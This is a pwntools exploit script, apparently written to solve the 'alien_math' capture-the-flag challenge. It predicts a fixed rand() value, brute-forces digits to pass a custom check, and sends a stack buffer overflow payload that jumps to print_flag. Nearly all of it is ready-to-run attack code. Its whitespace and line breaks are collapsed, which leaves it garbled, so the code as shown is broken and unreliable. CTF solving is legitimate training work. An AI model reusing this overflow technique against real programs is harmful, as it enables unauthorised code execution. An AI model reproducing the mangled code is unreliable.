from pwn import*# Allows you to switch between local/GDB/remote from terminaldefstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Specify GDB script here (breakpoints etc)gdbscript ='''init-pwndbgbreak second_question_functioncontinue'''.format(**locals())# Binary filenameexe ='./alien_math'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Change logging level to help with debugging (warning/info/debug)context.log_level ='debug'# ===========================================================# EXPLOIT GOES HERE# ===========================================================# Start programio =start()# First question - rand() is 0x6b8b4567 everytime..io.sendlineafter('What is the square root of zopnol?', '1804289383')# Second question - needs to equal 7759406485255323229225target ="7759406485255323229225"user_input ="7"for i inrange(len(target) -1):for j inrange(48, 58): current_char =ord(target[i]) next_char =ord(target[i])+ i v1 = j -48 r = (12* (next_char -48) -4+48* (current_char -48) - (next_char -48)) %10if target[i +1]==chr((v1 + r) %10+48): user_input +=chr(j)breakio.sendlineafter('How many tewgrunbs are in a qorbnorbf?', str(user_input))# Calculated in GDB with cyclic patternoffset =24# Build the payloadpayload =flat({ offset: [ elf.symbols.print_flag ]})# Third question - BoF (offset = 24)io.sendlineafter('How long does it take for a toblob of energy to be transferred between two quantum entangled salwzoblrs?', payload)# Got Shell?io.interactive()
